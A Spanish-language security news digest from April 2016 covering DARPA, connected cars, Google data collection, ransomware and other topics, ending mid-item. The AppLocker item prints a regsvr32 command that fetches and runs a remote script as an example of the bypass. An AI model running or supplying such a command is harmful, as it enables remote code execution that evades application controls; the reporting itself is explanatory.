26 de abril de 2016

DARPA. Pretende crear una aplicación de mensajería ultra segura para los militares de EEUU

La Agencia de Proyectos de Investigación Avanzados de Defensa o más conocida como DARPA, ha lanzado un nuevo proyecto dirigido a las empresas privadas del sector, con el objetivo de desarrollar una aplicación de mensajería y plataforma de transacción de datos ultra segura y que sea a prueba de cualquier hacker.
El DARPA está buscando a investigadores de seguridad para crear la aplicación de mensajería instantánea definitiva, que proporcione la más alta seguridad en las comunicaciones para proteger la información confidencial que fluya a través de ella. Además esta aplicación debería ser accesible tanto a través de los dispositivos móviles como a través del propio navegador de Internet.
Esta aplicación que desea tener el DARPA debe tener algunos requisitos de seguridad, como por ejemplo que la creación de los mensajes, el transporte de la información y la recepción de los mensajes sean totalmente descentralizados, de tal forma que no haya un servidor central por el que fluya toda la información que pueda ser atacado. De esta forma, cualquiera en cualquier sitio podrá enviar mensajes de forma segura a través de múltiples rutas, totalmente descentralizado.
Cifrado de datos
El DARPA no quiere una aplicación de mensajería que implementen las típicas medidas de seguridad y cifrado que ya usan otras aplicaciones como Signal, WhatsApp o Telegram, sino que use protocolos descentralizados como Blockchain para evitar los ataques y la vigilancia de los usuarios que la usen.
Esta aplicación ultra segura de mensajería sería desarrollada en tres fases:
  1. Crear un modelo de descentralización como Blockchain y proporcionar protocolos de cifrado.
  2. Desarrollar y probar su funcionamiento a fondo.
  3. Comercializar e implementar a gran escala la plataforma.
El DARPA ha proporcionado 150.000 dólares por año a los candidatos que pasen la primera fase, los candidatos para la fase 2 podrán ganar hasta 1 millón de dólares durante dos años. Durante la última fase, los candidatos podrán comercializar e implementar su solución globalmente, pero sin recibir fondos de EEUU. Este proyecto empezará el próximo día 23 de Mayo de 2016 y terminará el 22 de Junio de 2016.
Fuente: The Hacker News

2020. El 75% de los coches estarán conectados a Internet

¿Son sistemas seguros y confiables o podríamos llegar a perder no sólo el control del sistema de entretenimiento de un vehículo sino el de la conducción incluso circulando?
Empresas de tecnología se refieren hoy al coche como dispositivo móvil: “el dispositivo móvil definitivo”.
  • La industria de la movilidad mira hacia la automoción y al igual que hoy no se concibe conducir sin aire acondicionado, sin cinturón o sin poder escuchar música, pronto nadie imaginará un automóvil sin conexión con el sistema domótico del hogar o sin posibilidades de comunicarse con la policía y los equipos de rescate ante un accidente, porque el coche será un móvil con ruedas.
  • El objetivo de los objetos inteligentes o Internet de las Cosas es que todo lo que usamos en nuestro día a día esté conectado. En cinco años, más de 50.000 millones de dispositivos estarán conectados pero todo lo que se conecta a internet es susceptible de ser hackeado, incluido un coche.
  • “El coche conectado y el móvil en nada se diferencian, pero si bien somos conscientes de la necesidad de securizar un móvil, no lo somos tanto en el caso del coche. La vulnerabilidad de cualquier coche conectado es posible, de la misma manera que en el resto de dispositivos conectados: cualquiera que conozca la dirección IP de un vehículo podrá hackearlo y tomar el control en remoto e incluso estando en marcha en carretera”, asegura Mónica Valle, experta en ciberseguridad y responsable de contenidos de Mundo Hacker Day 2016, el mayor encuentro de seguridad informática de España que se celebra el próximo 27 de abril en Madrid y en el que se mostrará en directo el hackeo de un coche, entre otros temas.
Una amenaza real
  • En EE.UU. el Congreso manifestó a los fabricantes de coches la necesidad de tomar medidas ante las amenazas de seguridad en los automóviles tras llegar a sus oídos varios casos de demostraciones de hackers que no sólo conectaron el sistema de climatización, cambiaron la emisora de radio o encendieron los limpiaparabrisas, sino que llegaron incluso a desconectar el motor y los frenos de forma inalámbrica y a 16 km de distancia del vehículo, introduciéndose, vía wi-fi, en el sistema multimedia que equipaban, en aquel momento, 471.000 vehículos vendidos en el país. Utilizando una vulnerabilidad del sistema, llegaron a reprogramar componentes del vehículo y enviar órdenes a la centralita principal del coche.
  • Otro conocido fabricante sufrió hace algo más de un año el hackeo de varios vehículos aparcados en una calle. Y aunque son muchas las marcas que anuncian actualizaciones que evitan este tipo de vulnerabilidades la realidad es que se siguen produciendo, tal y como se demostrará en el próximo encuentro de Mundo Hacker Day.
  • Durante el ejercicio pasado, el 14% de los coches vendidos tenía algún tipo de conectividad. En apenas 4 años, en 2020, el 75% de los coches comercializados serán coches conectados. Podremos controlar remotamente nuestro coche, deteniéndolo o reiniciándolo desde nuestro sofá a través del dispositivo móvil o tableta.
  • La posibilidad de que terceros puedan hacer lo mismo es una de las inquietudes que serán abordadas en Mundo Hacker Day 2016, evento que el miércoles 27 reune a más de 2.500 expertos en ciberseguridad de todo el mundo para debatir y compartir información sobre la necesidad de proteger un mundo dependiente de dispositivos conectados –el Internet de las Cosas– y los retos que plantean los ataques a infraestructuras críticas, tanto públicas como privadas.
Mundo Hacker Day 2016 cuenta con el patrocinio principal de Check Point, Hewlett-Packard Enterprise, Intel y Sophos y el apoyo institucional de INCIBE.

Fuente: Diarioti.com

BCE. Experimenta con la tecnología detrás del bitcoin

El Banco Central Europeo (BCE) está haciendo un "trabajo experimental" con la misma tecnología que respalda a la moneda virtual bitcoin, pero necesita más análisis antes de sopesar su adopción, dijo el lunes un miembro del Comité Ejecutivo del banco.
Yves Mersch dijo que el BCE estudiará si la Tecnología de Registros Diseminados (DLT, por sus siglas en inglés), una base de datos compartida que puede ser usada para asegurar y validar cualquier tipo de transacción, puede ser adoptada como infraestructura para el sistema de bancos centrales de la zona euro.
"Desde la perspectiva de un banco central, en el contexto de nuestras reflexiones estratégicas sobre el futuro de las infraestructuras del mercado Eurosystem, estamos ciertamente abiertos a las nuevas tecnologías y, al igual que muchos actores del mercado, hemos puesto en marcha un trabajo experimental con la DLT", afirmó Mersch.
"Es evidente que tenemos mucho más que analizar sobre las dudas relacionadas con la DLT y sus implicaciones de política", agregó.
La tecnología de cadena de bloques ("Blockchain") fue usada por vez primera para respaldar a bitcoin, pero desde entonces ha sido probada e incluso adoptada por algunas corredurías y bancos para otros cometidos, como operaciones y compartir datos.
La correduría ICAP dijo a principios de año que se había convertido en la primera en distribuir datos de operaciones a clientes usando esta tecnología y 40 de los mayores bancos mundiales, como HSBC y Citi, también probaron un sistema basado en el sistema para comerciar renta fija.
Un reporte del Banco de Pagos Internacionales publicado a fines del año pasado dijo que esta tecnología podría reducir la necesidad de intermediarios como bancos y cámaras de compensación y convertirse, incluso, en un "reto hipotético" para los bancos centrales.
Fuente: Reuters

FACEBOOK. Aumenta el número de personas que acceden a la red social por medio de Tor

Facebook ha dado a conocer el número de personas que han entrado a la red social a través de Tor, una cifra que ha aumentado en dos últimos años. De hecho, durante el último mes superó el millón de usuarios.
"Es importante para nosotros proporcionar métodos para que la gente use nuestros servicios de forma segura”, ha explicado Facebook en su blog oficial. En los dos últimos años que Facebook permite Tor, el número de personas no ha dejado de crecer. “El número ha crecido y, este mes, por primera vez, vimos una cifra superior al millón de personas”, cuenta.
La red social cuenta con sus propias web y aplicación para Tor, bajo los dominios .onion, e implementó, además, la conectividad a Tor desde la app para Android a través de Orbot.
“Esperemos que continuen proporcionando 'feedback' y ayudándonos a seguir mejorando”, explican desde la red social de Zuckerberg. Un aumento de usuarios que coincide, además, con la creciente preocupación por la privacidad y los datos y con la polémica entre partidarios del acceso a la información de los usuarios y decractores, destacando el reciente caso del FBI con el iPhone de San Bernardino.
Más información
Fuente: Europa Press

ONU. Preocupada por los 'robots sesinos' (drones), que debate su regulación

El aumento de robots autónomos y su uso militar se ha convertido en debate continuo. Por ello, diplomáticos de todo el mundo se han reunido en Ginebra para celebrar la tercera Reunión Informal de Expertos de las Naciones Unidas sobre Sistemas de Armas Letales Autónomas.
La reunión de Ginebra, según explica The Conversation, ha sido una reunión informal para tratar lo que debía o no regularse y alcanzar un consenso, en lo que a robots, inteligencia artificial y drones se refiere.
Lo principal a abordar en esta reunión era establecer si las leyes deben ser reguladas por el derecho internacional humanitario. Todas las posturas tratadas durante la reunión se han resumido resumidas en cuatro propuestas, según cuenta el medio citado.
Entre las propuestas, la posición del Reino Unido en este asunto es que el derecho internacional humanitario que existe en la actualidad debe ser suficiente para regular las nuevas tecnologías que surjan basadas en inteligenia artificial y en robótica, al igual que ya lo fue en su día para regular submarinos o aviones.
Por su parte, la delegación francesa cree que una oposición total a estos robots no sería adecuada y sería algo “prematuro”. En Francia están abiertos, explican, a aceptar la legalidad manteniendo a humanos en este proceso: serán los humanos los que hagan decidir a los robots pese a que los robots disparen y seleccionen los objetivos.
Por su parte, Holanda y Suiza sugieren que los humanos tengan mayor peso en la toma de decisiones de estos robots para evitar que se produzcan errores y se cumpla la ley. Sin embargo, Reino Unido, Francia y Canadá son contrarios a esta prohibición, ya que consideran que las máquinas pueden ser más precisas y ser moralmente superiores a los humanos.
Por último, la decisión más tajante de todas las propuestas de la reunión es la de Pakistán y Palestina, que apoyarían cualquier med
Fuente: Europa Press

GOOGLE. Información recopilada de los usuarios

Gmail, Google Drive, Google Fotos, Youtube. Los de Mountain View tienen en el mercado un gran número de servicios o plataformas que están en el día a día de mucha gente. El acceso a todas estas cosas, sea a través de un desembolso de dinero o de manera gratuita, implica que la compañía almacene sus datos.
Para hacerse una idea más concreta de los conocimientos recopilados, vamos a clasificarlos por diferentes apartados para clarificarlos y cuantificarlos mejor.
Páginas webs que visitas
  • La compañía almacena información sobre todo aquello que busca en Internet, además en qué sitios entra o deja de entrar, cuántas veces lo hace y en qué días, e incluso lo que se dedica a hacer cada vez que visita un sitio web o que ingresa una búsqueda en su propio buscador.
  • Todo lo cual le sirve a Google para “mejorar el servicio que proporciona a los usuarios”, o lo que es lo mismo, para ofrecer anuncios personalizados según los gustos y que estos surtan más efecto en los individuos, para ofrecer recomendaciones personalizadas en Youtube, para recibir informes de errores en el sistema o para saber qué tipo de navegador de Internet utiliza y cómo, entre otras muchas cosas.
  • Para consultar todo el registro que Google ha guardado sobre ustedi, basta con pulsar en este enlace (https://history.google.com/history/?utm_source=sidenav ). Aquí se muestran estadísticas de búsquedas por determinados periodos de tiempo y qué sitios visita. Puedes eliminar el historial que crea conveniente. La navegación privada no queda registrada.
Dispositivos móviles (tabletas y teléfonos)
  • Los dispositivos con Android son aquellos que más información recaban para Google. En estos casos, los de Mountain View se quedan con la información de los contactos que tenga guardados (tanto nombres como número de teléfono, dirección, correo, etc.), así como con los datos de las aplicaciones.
  • También recaba información sobre su operador de telefonía, qué móvil tiene, qué marca, sus datos bancarios para usar Google Play, etc. Es más, cada vez que tienes la pantalla del terminal en el estatus activo, Google lo revisa para que no se le escape nada de información.
  • Para consultar los datos de los dispositivos que le haya enviado a Google basta con hacer clic en este enlace (https://history.google.com/history/device?utm_source=sidenav ).
Aplicaciones y servicios que usas
  • Los de Mountain View no se quedan ahí, sino que recopilan cómo, cuándo, cuánto y con qué frecuencia usa las aplicaciones, qué tipo de cosas descarga, si se trata de contenido de pago o no, etc.
  • También almacenan los permisos que necesitan las aplicaciones, sitios o servicios para funcionar, es decir, los permisos a los que haya dado el visto bueno de aquel software que tiene acceso a su cuenta de Google.
  • En cuanto a los servicios, Google muestra todos los servicios de la compañía que utilizas en esta página (https://www.google.com/settings/dashboard ). Aquí, puedes saber cuándo se ha sincronizado por última vez la información y qué se ha añadido, así como tus contactos, datos del calendario, marcadores de Chrome, etc. En esa misma página se pueden administrar los distintos aparatados.
Youtube
  • Youtube es uno de los servicios estrella de los de Mountain View. Puede ser que no tenga un móvil Android, que no use Google Drive o que nunca hayas utilizado su plataforma para blogs, Blogger, pero raro será que nunca vea un solo vídeo en Youtube, aunque sea un tutorial cuando se le rompe algo o no sabe usarlo.
  • La plataforma de vídeos almacena el historial de todo el contenido que vea siempre y cuando esté conectada a su cuenta de Google – algo necesario para suscribirse a canales –. Concretamente, guarda el título del vídeo en un enlace al mismo, la hora y la fecha exacta en que lo has visionado.
  • El buscador de Youtube no se queda fuera de ese almacenamiento de datos, porque todo lo que busca en él se queda registrado.
  • Puedes consultar su historial de búsquedas y de reproducciones desde la propia plataforma de Youtube (https://www.youtube.com/feed/history/search_history ) o desde las opciones de Google pulsando aquí (https://history.google.com/history/youtube/search?utm_source=sidenav ).
Google now
  • Google Now tampoco se libra. Todo lo que le ha dicho alguna vez a Google Now mediante la voz está almacenado en los servidores de la compañía. ¿El motivo? Que los de Mountain View lo usan para hacer modelos de tu voz con los que mejorar la inteligencia artificial del asistente de voz.
  •  Las grabaciones están ordenadas por fecha, de más nueva a más antigua, y puedes escuchar tus propias palabras con solo pulsar en el botón de reproducir. Los elementos de la lista se pueden borrar.
Ubicación y recorrido realizados
  • Si tiene un móvil, ya sea Android o iOS, en el que uses Google Maps, la compañía tendrá acceso a sus búsquedas y a su ubicación siempre que uses la aplicación para consultar cosas, marcar rutas, etc.
  • Además, es posible que sus dispositivos (Android) envíen de forma constante información de dónde se encuentra y a dónde vas a Google, llegando a almacenar recorridos completos por orden cronológico de visita (salgo de casa, voy al parque, vuelvo a casa).
  • La empresa puede llegar a tener un información personal detallada de dónde vive, dónde trabaja, a qué sitios va de forma más frecuente y cuánto tiempo pasa en ellos cada vez que los visita, así como la fecha y la hora en el que la ubicación de su móvil almacene que ha estado en uno de esos lugares.
Intereses para la publicidad
  • Muy unido al historial de páginas webs visitadas se encuentran los intereses que puede seleccionar o no de cara a controlar más los anuncios que te salen por la red.
  • El hecho de que se aparezcan anuncios que puedan resultarle llamativos se debe a los intereses que tiene marcados. Esto segmenta la publicidad gracias a que ayudan a crear un perfil de gustos, edad y género, entre otros datos, para enfocar mejor lo que ve o deja de ver, resultando todo mucho más personalizado a cambio de unos “pocos” datos.
  • Para ajustar estos intereses solo hay que ir al siguiente enlace y marcar o desmarcar aquello que se adecue más a tu persona. (https://www.google.com/settings/u/0/ads/authenticated )
Otros datos: drive, notas, blogs y más
  • Aunque las categorías anteriores son quizá las llamativas en lo que a datos almacenados se refiere, Google va más allá y guarda mucha más información, aunque pueda pasar más desapercibida para algunos.
  • Si tienes un blog de Blogger, debe saber que las publicaciones y comentarios que haga quedan almacenados en sus servidores. Los eventos del calendario, los contactos y amigos de Google+, las conversaciones de Hangouts, las notas de Google Keep y lo que compres con Google Wallet, también serán carne de cañón para Google.
  • Además, los correos electrónicos que envía y recibe, así como la libreta de direcciones, también serán recogidos por la compañía. Los archivos que suba a la nube de Google Drive y las imágenes de Google Fotos corren la misma suerte que todo lo anterior.
¿Quieres saber todo con pelos y señales? Descarga tus datos
  • Si estás interesado en saber con más profundidad todo lo que ha ido recopilando Google sobre ustedi, la propia compañía ofrece una herramienta con la que descargar todos los datos que tiene sobre ti ( https://takeout.google.com/settings/takeout )
  • Esta función le permite ver una lista con todos los productos que tienen algún tipo de información sobre usted, así como echar un vistazo rápido a los detalles de la misma.
  •  Una vez que esté delante la página, marque aquellos servicios de los que quieras saber más, dale al botón de “siguiente” que aparece abajo del todo, selecciona el tipo de archivo que desee, el método de entrega y dele a “crear archivo”. Y aparecerá  delante de usted todos los datos que Google conoce sobre su persona.
Fuente: Europa Press

CONFICKER. Las empresas aún son víctimas de este malware, que apareció hace 8 años

Los incidentes de seguridad se podrían eliminar, o al menos reducir su impacto, si se aplicaran las técnicas básicas de higiene de seguridad cibernética.
“La gran mayoría de las intrusiones y los ataques cibernéticos más significativos de los estados-nación podrían haberse detenido si las organizaciones hubieran seguido tan solo las prácticas de seguridad cibernética más básicas”, ha afirmado el director del equipo nacional de respuestas ante emergencias informáticas (CERT) en Reino Unido, Chris Gibson.
Gibson ha manifestado que la mayor amenaza de seguridad sigue siendo el malware. Muchas empresas todavía están luchando contra las infecciones del gusano Conficker, que apareció por primera vez hace 8 años.
“El año pasado se registraron 530.000 incidentes relacionados con Conficker”, ha declarado el responsable, tal y como recoge ZDNet.
El 80% de todos los ataques se podrían prevenir mediante la mitigación sencilla, con procedimientos como antivirus, buenas contraseñas y la segmentación de la red. El daño de algunos incidentes importantes podría haber sido mucho menor si se hubieran seguido los procedimientos.
Fuente: Silicon.es

DEMOLEDOR. El 17% de los emails contiene virus

Según se desprende de un informe elaborado por los expertos de la empresa Retarus, durante el mes de marzo se ha producido un aumento en el número de emails infectados por virus.
En concreto, el 17% de los correos electrónicos analizados contenía algún virus, lo que implica que uno de cada seis emails que son enviados a cuentas de correo empresariales contiene elementos maliciosos.
El informe también expone que en los últimos tiempos es el criptotroyano bautizado como Locky es el que está teniendo mayor relevancia, aunque ya están apareciendo variantes peligrosas como KePanger, PowerWare y Petya.
Desde Retarus recomiendan a los usuarios que estén ojo avizor en sus correos electrónicos para detectar la presencia de ransomware, y les sugieren que desactiven la ejecución automática embebida de macros en los programas de Office, de forma que estas solo se activen en documentos que se haya comprobado que son seguros.
Por otra parte, indican que es necesario que los usuarios tengan backups de los datos que consideren importantes, de forma que si se ven afectados por un virus puedan recuperar sus datos.
Eso sí, en la compañía precisan que hay que tener en cuenta que Locky también puede llegar a afectar a dispositivos externos que están conectados de forma permanente al ordenador.
Asimismo, comentan que si un usuario experimenta bajadas en la velocidad de respuesta de su procesador, exceso de actividad en su disco duro, o descubre archivos con la extensión .locky, cabe la posibilidad de que haya sido infectado y debería recurrir a un antivirus para salir de dudas.
Fuente: Silicon.es

WINDOWS. Una vulnerabilidad permite saltarse los controles de seguridad de AppLocker

Recientemente, un investigador de seguridad ha descubierto una vulnerabilidad en una herramienta de línea de comandos de Windows, Regsvr32, la cual puede permitir la descarga y ejecución de librerías y scripts de forma remota evadiendo todos los demás controles de seguridad.
Regsvr32 es una utilidad muy utilizada en instaladores o en series de comandos por lotes para registrar rápida y fácilmente librerías DLL en el sistema, sin embargo, esta herramienta no aporta ningún tipo de control ni está correctamente documentada ni limitada, lo que ha abierto la puerta a una serie de ataques informáticos en los que un atacante registra en el sistema librerías DLL desde fuentes externas (por ejemplo, desde una URL), e incluso scripts, con el fin de comprometer el sistema.
Un ejemplo de uso malintencionado de esta herramienta sería ejecutando:
regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll
Como hemos dicho, el primer problema que tiene esta herramienta es que no está correctamente documentada, por lo que nadie sabe muy bien cómo funciona ni cómo utilizarla de forma segura. Además, una incorrecta delimitación permite que se carguen scripts en JavaScript o VisualBasic desde el propio bloque de comandos en lote, así como tener acceso total a Internet tanto por HTTP como desde el proxy del sistema y es compatible con el tráfico cifrado TLS, por lo que un atacante puede alojar en un servidor remoto la librería maliciosa o el script y descargarlo en el sistema de forma totalmente oculta.
Por todo ello, los piratas informáticos pueden instalar de forma remota librerías en el sistema, las cuales puedan explotar para tomar el control del sistema con privilegios totales sobre el mismo, todo ello sin necesidad de tener permisos de administrador en el equipo.
Vulnerabilidad regsvr32
  • Estos ataques informáticos son imposibles de detectar y ni Windows ni AppLocker pueden bloquearlos
  • Tal como aseguran los expertos de seguridad, estos ataques son totalmente imposibles de detectar ya que, en teoría, es una función legítima y propia de Windows. Además, el atacante no necesita permisos de administrador para hacer uso de ella y, como hemos dicho, es capaz de ocultar su tráfico tras un proxy legítimo y usar tráfico cifrado para comunicarse con el servidor, aumentando así su peligrosidad.
  • Los usuarios que quieran analizar el funcionamiento de esta vulnerabilidad, pueden descargar la prueba de concepto desde GitHub.
  • Microsoft es consciente de esta vulnerabilidad y, probablemente, en alguno de los próximos boletines de seguridad de la compañía veamos una revisión de la misma que dota a los administradores de un mayor control sobre las librerías que se pueden o no se pueden importar al sistema, sin embargo, a día de hoy, sigue siendo una vulnerabilidad abierta y, lo peor de todo, conocida, por lo que debemos tener cuidado a la hora de instalar programas y ejecutar scripts en nuestro sistema Windows.
Fuente: subt0x10

TROYANOS. Crece la actividad de los tipo RAT, indetectables y alojados en la memoria RAM

Recientemente, los expertos de seguridad de SentinelOne han detectado una nueva técnica de carga para los troyanos que permite su ejecución directamente en la memoria RAM sin pasar en ningún momento por el disco duro y de forma totalmente cifrada. 
De esta manera, el malware es capaz de evadir la mayoría de los sistemas de seguridad actuales, ya que estos se basan principalmente en analizar ficheros guardados en el disco duro y, en este caso, no se puede analizar algo que, sencillamente, no existe. Los análisis por comportamiento de procesos que incluyen algunas suites de seguridad sí son capaces de detectar su ejecución, aunque de una forma no demasiado eficaz.
La técnica, bastante complicada de explicar, se basa principalmente en el uso de una aplicación totalmente inofensiva para descargar otros archivos totalmente inofensivos, en este caso, una serie de imágenes .png formadas por pixels de colores. Mientras que estos pixels no tienen ningún significado para el ojo humano, los ordenadores sí saben interpretarlos y, al descifrarlos, consiguen un script que, inyectado al proceso inofensivo de la primera aplicación, la convierten en el troyano de acceso remoto, sin que en ningún momento este haya estado alojado en el ordenador.
Además, este malware incluye una serie de técnicas adicionales como la capacidad de detectar si se ejecuta sobre una máquina virtual y detectar herramientas de análisis de procesos para poder saber si se le está intentando analizar en un entorno de pruebas y, de ser así, eliminarse a sí mismo.
Por el momento solo se han detectado troyanos con esta técnica en varios países de Asia, aunque es muy probable que, de tener éxito, termine por llegar al resto del mundo. Sea como sea, los piratas informáticos cada vez descubren nuevas formas más complejas para ocultar y ejecutar sus piezas de software malicioso.
Es muy complicado protegerse de algo que, en teoría, no existe, aunque, igual que siempre, debemos evitar descargar y ejecutar archivos desde fuentes de dudosa confianza (correos electrónicos, descargas desde páginas web sospechosas, etc) de manera que evitemos descargar ningún ejecutable aparentemente inofensivo pero que, en realidad, pueda suponer un riesgo considerable para nuestro equipo.
Fuente: Sentinelone

OPERA. El servicio VPN del navegador es solo es un proxy

Expertos en seguridad demuestran que la VPN de Opera que en realidad es un simple servidor proxy.
Siempre que aparece una nueva función, y más si se trata de una relacionada con la seguridad, los expertos del sector se dan prisa en realizar pruebas y comprobar la eficacia de la solución. Michal Spacek es un reputado desarrollador de PHP que recurrió a sus herramientas para realizar un debug de la función que por defecto viene preconfigurado. Sin embargo, pronto se dio cuenta que la función no era lo que parecía que aquello en realidad tenía más bien poco de servicio VPN.
Hay que tener muy en cuenta en primer lugar de cuales son las diferencias entre este y un proxy, ya que el primero afecta a todo el tráfico mientras que el segundo se centra básicamente en la protección de los datos que se generan en la navegación web.
Pero sin ir más lejos, en el menú de configuración web ya queda claro que el servicio VPN de Opera no es en realidad lo que se ha anunciado a los usuarios: VPN de opera solo es un proxy
La VPN de Opera ha desatado muchas críticas
  • El experto en seguridad aclara que se trata de un proxy precargado en el navegador web que garantiza la protección del tráfico entre el usuario y el servidor proxy, y no extremo a extremo como una VPN.
  • Otros añaden que para proteger los datos de navegación web es más que suficiente y que al tratarse de este software es normal que no se lleve a cabo la protección de toda la información generada por los programas existentes en el equipo, algo que queda reservado para los VPN.
Escépticos con el manejo del proxy
  • A muchos usuarios no les ha gustado esta implementación y se muestran en realidad desconfiados sobre quién maneja estos servidores y el tratamiento de la información cuando esta llega a estos. No es la primera vez que se desvía los datos de la navegación de los usuarios para recopilarlos y así ofrecerlos a servicios publicitarios, de ahí que muchos desconfíen en un primer momento de la solución aportada por Opera para proteger los datos de la navegación de sus usuarios, más aún cuando informan de una VPN que no lo es.
Fuente: Softpedia

BACKUP. El 33% de empresas no realizan copias de seguridad correctamente, según CloudBerry

Un nuevo informe de  CloudBerry , ha analizado las prácticas de backup de datos de varias empresas, y el resultado es inquietante porque muchas de ellas deben actualizar sus soluciones de copias de seguridad.
CloudBerry es una empresa con soluciones para la realización de copias de seguridad que posteriormente son subidas a varias “nubes” de diferentes proveedores
Según el informe desprendido por CloudBerry, el 49% de las empresas encuestadas tan solo tienen una copia de seguridad de sus datos, por lo que implica que corren riesgos si los datos de ese backup se ven dañados, no se pueden leer o terminan quedando inaccesibles completamente.
La solución está en el Cloud…

  • Actualmente disponemos de una gran cantidad de servicios en el Cloud para empresas, servicios como Amazon S3, Amazon Glacier, Google Cloud Storage o Microsoft Azure son algunos de los más conocidos. Simplemente con darnos de alta en un par de estos servicios y subir nuestras copias de seguridad, será suficiente para estar seguros que en caso de desastre ya que podremos recuperar fácilmente nuestros datos.
  • Otro dato muy preocupante es que el 36% de las empresas no realizan ninguna copia de seguridad de sus datos, por lo que en caso de fallo hardware o intrusión en sus sistemas, no tendrán forma de volver hacia atrás. Sí es cierto que el 36% de las empresas realizan correctamente sus copias de seguridad, haciendo un backup completo en varios lugares.
Acronis-backup-cloud

  • Otras estadísticas de este estudio de CloudBerry es que el 25% de las empresas han perdido parte de sus datos varias veces e incluso muchas veces, y siguen sin utilizar algún sistema de copias de seguridad. Por último, un 44% de los que realizan copias de seguridad, optan por hacerlo en soportes físicos como discos duros externos, y el 26% se decanta por servicios en la nube.
Aunque también es el problema

  • Por último, un 62 por ciento de las compañías participantes en el informe de CloudBerry indicaron que les preocupa la seguridad cuando se trata de soluciones cloud destinadas al backup de sus datos. Ya que no está la información guardada bajo su poder, sino en el de las empresas. ¿Cómo podríamos evitar esto? Cifrando todos los datos que subamos a dichas “nubes” antes de enviar nada, de esta forma, solo nosotros que conocemos la clave de descifrado podremos leer la información.
Fuente: Redeszone.net

BITCOIN. Culpabilizado por la proliferación de ransomwares

Antes fue la red Tor, la culpable de la proliferación de la creación de amenazas informáticas. Ahora los gobiernos de varios países centran sus miradas en las criptomonedas, concretamente en Bitcoin. 
Acusan a esta de servir como soporte para los ciberdelincuentes y así financiar las creación de virus informáticos, para ser más exactos versiones de ransomware que crean muchos problemas.
Para ser más exactos, las autoridades han cargado contra el sitio web Coin.mx, que ofrece un monedero virtual a los usuarios y la posibilidad de realizar transacciones con total garantías. Desde algunos gobiernos afirman que este servicio ha sufragado el desarrollo de amenazas y ha protegido a los ciberdelincuentes, entorpeciendo las investigaciones realizadas. 
Desde las autoridades estadounidenses creen que la información de las transacciones que no se ha facilitado y por lo que se encuentra abierta una causa habría permitido ya la detención de los responsables y haber parado la distribución de estas amenazas informáticas.
Fuente: Softpedia

BLOQUEADORES DE ANUNCIOS. ¿ Serán ilegales en Europa?

Los frentes abiertos referidos a la privacidad son muchos y parece que los bloqueadores de anuncios van a tener su papel importante. Y es que todo parece indicar que en Europa está todo listo para ilegalizar la utilización de este tipo de aplicaciones, o al menos eso parece.
Con la aprobación de la ley se permitiría el rastreo de los equipos en busca de este tipo de software, violando la privacidad de los usuarios, algo que se suele hacer con bastante frecuencia. Desde muchas asociaciones afirman que todos los scripts, bien sea del lado del usuario o del servidor, que intenten recopilar cualquier tipo de dato incumplirán la normativa que ampara a los usuarios en lo referido a la protección de su privacidad mientras hace uso de Internet.
Esto quiere decir que para realizar esta comprobación deberán recibir de alguna manera el consentimiento de los usuarios, pudiendo obligar a algo similar a lo que existe en la actualidad con las cookies, instando a los sitios web a los usuarios a aceptar estas prácticas o bien rechazarlas.
Si todo sale adelante, es probable que sin tardar demasiado los usuarios deban responder a una mensaje sobre si permiten el escaneo de su navegador web en busca de bloqueadores de anuncios.
In formal opinion @EU_Commission reference #adblock detection as #spyware under Recital 24 & 65 of Citizens’ Rights Directive #privacy
— Alexander Hanff (@alexanderhanff) 20 de abril de 2016
Bloqueadores de anuncios catalogados como spyware
  • Como casi siempre sucede, también tendremos dos bandos, formados por los usuarios que desean hacer uso de estas aplicaciones y en otro los propietarios de páginas web que estarían a favor de esta medida para así obtener un mayor retorno en lo referido a publicidad.
  • Pero sin lugar a dudas lo que más llama la atención, es que de aprobarse finalmente el texto las herramientas de seguridad podrían en algún momento detectar este tipo de software como spyware y proceder a su eliminación, por no hablar de leyes derivadas que podrían obligar a los responsables de los principales navegadores web a retirarlos de las tiendas.
  • Sin embargo, de esto se deriva otro enfrentamiento, pudiendo aparecer otro en el que se trate el bloqueo de los usuarios que utilizan estos al contenido de determinadas webs, algo que tampoco gusta mucho y que está siendo motivo de debate en la actualidad.
Fuente: Softpedia

BACKDOOR. Un investigador de seguridad descubre una puerta trasera en un servidor de Facebook

Un investigador de seguridad llamado Orange Tsai de la compañía de seguridad taiwanesa DEVCORE, estaba estudiando a fondo diferentes servidores de Facebook con el objetivo de encontrar vulnerabilidades de seguridad o fallos cuando accidentalmente se topó con un backdoor en uno de los servidores corporativos de Facebook.
Así descubrió el backdoor en un servidor corporativo de Facebook
  • Este investigador estaba escaneando todo el espacio de direcciones de Facebook, hasta que dio con un dominio que estaba utilizando una versión vulnerable de una aplicación, esta aplicación se encarga de la transferencia segura de archivos y es usada por los empleados de Facebook para compartir archivos y también para colaborar en nuevos desarrollos.
  • Tsai analizó esta aplicación vulnerable y descubrió 7 fallos de seguridad (3 fallos de seguridad de tipo Cross-site scripting, 2 fallos de seguridad de ejecución de código remoto y otros 2 fallos de escalada local de privilegios de usuario). Entonces este investigador aprovechó dichas vulnerabilidades para acceder al servidor de Facebook y empezar a analizar la información que allí había para posteriormente realizar un documento con toda la información recogida y comunicárselo a la compañía para que solucionaran dicho fallo.
  • Tsai se encontró que había instalado un backdoor que había sido puesto por un ciberdelincuente para obtener información de los credenciales de los trabajadores de Facebook. Tsai reportó estas vulnerabilidades y también que se encontró un backdoor en su interior, Facebook revisó su investigación y le recompensó con 10.000 dólares por su gran trabajo.
Los credenciales de los usuarios no se han visto comprometidos
  • Un detalle muy importante de este problema que encontró Tsai, es que el backdoor estaba en un servidor corporativo de la compañía, y los credenciales de los millones de usuarios están almacenados en un servidor central, que no está conectado a este servidor que han comprometido.
Más información
Fuente: The Hacker News

7ev3n-HONE$T. Este ransomware cifra los archivos y cambia su nombre

Un investigador de seguridad ha detectado en la red un aumento preocupante de una nueva variante del ransomware 7ev3n-HONE$T. Cuando este malware cifra los datos de su víctima, le pide el pago de un rescate de unos 400 dólares, en forma de Bitcoin, por poder recuperarlos.
Nada nuevo en esta variante de ransomware, sin embargo, analizando su comportamiento se ha podido ver cómo, una vez cifrados los archivos con la extensión .R5A, estos se renombran utilizando un orden secuencial, quedando la carpeta con ficheros de la siguiente manera: 1.R5a, 2.R5A, 3.R5A, etc. Cuando se cambia el nombre a un fichero, el original de guarda en el fichero “C:\Users\Public\files” para, si se paga el rescate, renombrarlos a su nombre original.
Este ransomware se esconde, generalmente, en la carpeta “C:\Users\Public” y está formado por los siguientes ficheros:
  • C:\Users\Public\conlhost.exe – El binario ejecutable del ransomware en sí.
